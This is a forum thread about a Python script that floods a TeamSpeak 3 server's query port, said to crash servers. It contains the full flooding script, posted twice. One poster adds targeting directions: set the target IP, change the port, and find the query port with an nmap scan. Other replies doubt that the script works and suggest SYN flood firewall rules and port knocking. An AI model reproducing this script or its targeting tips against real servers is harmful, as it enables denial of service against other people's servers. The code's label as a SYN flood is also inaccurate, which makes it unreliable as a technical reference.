Be aware from this script - TS3 SYN QUERY PORT FLOODING

developerm

Member
May 22, 2016
17
0
41
Hello guys,

It's very important for public teamspeak 3 servers
I have very bad problem about this shit python teamspeak 3 exploit.
https://www.dropbox.com/s/qb8zwfpoqrtvqtf/ts3exploit.py
This script is flooding to query with syn packets. After a while your server will crashed or your query port will get rekt and you will cant access to query.
Looks to script codes and if you have any idea about protection query ports from this script, please type your comments.

(Sorry for my bad english)
 

Nýuu™

Member
Nov 18, 2015
150
54
63
If when i change my query port, attackers can find my new query port with nmap very easy.
Also i dont want close query port from all ips.
You dont need to close them from all Ips, just set a limit for it and you should be fine & you can make it very hard to scan so it takes Years.
 

developerm

Member
May 22, 2016
17
0
41
You dont need to close them from all Ips, just set a limit for it and you should be fine & you can make it very hard to scan so it takes Years.
so can you help me example how can i do this on ubuntu 16.04 64bit
 

Jackbox

Active Member
Jan 2, 2016
197
96
74
My Python skills are a bit rusty, so pardon me. I have a feeling swapping the port for a variable would make sense too. :cool:

Code:
# TeamSpeak 3 'SYN/TCP' Flooding With Treading
# Using: /usr/bin/python ts3exploit.py
 
import socket
import threading
import random
 
class MonitorThread(threading.Thread):
        def run(self):
                try:
                        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                        #Change targetAddress to an IP for testing purposes.
                        targetAddress = "127.0.0.1"
                        s.connect((targetAddress, 10011))
                        for i in range(100):
                                s.send('login serveradmin')
                                s.sendto('login serveradmin',(targetAddress, 10011))
                                s.send('clientlist')
                                s.sendto('clientlist',(targetAddress, 10011))
                                s.send('channellist')
                                s.sendto('channellist',(targetAddress, 10011))
                                for i in range(100):
                                        s.send('serverinfo')
                                        s.sendto('serverinfo',(targetAddress, 10011))
                                        s.send('clientlist')
                                        s.sendto('clientlist',(targetAddress, 10011))
                                        for i in range(100):
                                                s.send('serverinfo')
                                                s.sendto('serverinfo',(targetAddress, 10011))
                                                s.send('channellist')
                                                s.sendto('channellist',(targetAddress, 10011))
                                print "\nFLOODING..."
                except Exception, ex:
                        pass
                     
for i in range(100):
        t = MonitorThread()
        t.start()
 

Kieran

Tag me
Contributor
Jan 1, 2016
459
286
122
Hello guys,

It's very important for public teamspeak 3 servers
I have very bad problem about this shit python teamspeak 3 exploit.
https://www.dropbox.com/s/qb8zwfpoqrtvqtf/ts3exploit.py
This script is flooding to query with syn packets. After a while your server will crashed or your query port will get rekt and you will cant access to query.
Looks to script codes and if you have any idea about protection query ports from this script, please type your comments.

(Sorry for my bad english)
This doesn't even work. I had 3 of those running for a while but nothing happened. Ping the same, reaction time the same, query works.
Okay after around 5 minutes the package loss is going up. lets see what else is happening

Nvm not working. Dont know why it temporarily went up
 
Last edited:

developerm

Member
May 22, 2016
17
0
41
This doesn't even work. I had 3 of those running for a while but nothing happened. Ping the same, reaction time the same, query works.
Okay after around 5 minutes the package loss is going up. lets see what else is happening

Nvm not working. Dont know why it temporarily went up
this script doesnt work on some ips like ovh game or have limited packets size query port servers.
If you want test type your target ip and change 10011 text for query port if you dont know target server query port, you can get query port easy with nmap tcp scan.

My Python skills are a bit rusty, so pardon me. I have a feeling swapping the port for a variable would make sense too. :cool:

Code:
# TeamSpeak 3 'SYN/TCP' Flooding With Treading
# Using: /usr/bin/python ts3exploit.py
 
import socket
import threading
import random
 
class MonitorThread(threading.Thread):
        def run(self):
                try:
                        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                        #Change targetAddress to an IP for testing purposes.
                        targetAddress = "127.0.0.1"
                        s.connect((targetAddress, 10011))
                        for i in range(100):
                                s.send('login serveradmin')
                                s.sendto('login serveradmin',(targetAddress, 10011))
                                s.send('clientlist')
                                s.sendto('clientlist',(targetAddress, 10011))
                                s.send('channellist')
                                s.sendto('channellist',(targetAddress, 10011))
                                for i in range(100):
                                        s.send('serverinfo')
                                        s.sendto('serverinfo',(targetAddress, 10011))
                                        s.send('clientlist')
                                        s.sendto('clientlist',(targetAddress, 10011))
                                        for i in range(100):
                                                s.send('serverinfo')
                                                s.sendto('serverinfo',(targetAddress, 10011))
                                                s.send('channellist')
                                                s.sendto('channellist',(targetAddress, 10011))
                                print "\nFLOODING..."
                except Exception, ex:
                        pass
                    
for i in range(100):
        t = MonitorThread()
        t.start()

You cant attack only change ip address this is not enough, you need change also "10011" text to target ip query port.
If you dont know target ip query port, you can get easily with nmap

Who coded that script xD
i got this script from my friend, i dont know his getting where but i know that this script work on all teamspeak 3 server versions.
Helpppp
 
Last edited by a moderator:

Kieran

Tag me
Contributor
Jan 1, 2016
459
286
122
this script doesnt work on some ips like ovh game or have limited packets size query port servers.
If you want test type your target ip and change 10011 text for query port if you dont know target server query port, you can get query port easy with nmap tcp scan.
Yes I know my query port.. I tried it on my own server and had 3 of them running at the same time. No effect. You sure that's even the script they are using?
 

Sigi

Active Member
Aug 15, 2016
3
0
75
Yes I know my query port.. I tried it on my own server and had 3 of them running at the same time. No effect. You sure that's even the script they are using?
i tried some servers but sometimes not working. i think this protected servers did something for block this script but still dont know how can i save my servers from this script. also for now i just close 10011 port from all ips. but i dont want it, i want my query port be online always. if you have any idea about this plz comment
 

Jackbox

Active Member
Jan 2, 2016
197
96
74
i tried some servers but sometimes not working. i think this protected servers did something for block this script but still dont know how can i save my servers from this script. also for now i just close 10011 port from all ips. but i dont want it, i want my query port be online always. if you have any idea about this plz comment
Pretty sure this is a generalized SYN flood. Look at SYN flood protection firewall rules.
 

sh4c4w

Member
Oct 27, 2015
5
2
35
Instead of fully exposing your query port to the world, use a port knocking script.
It's pretty simple and adds a very good layer of security on your network.
 
Top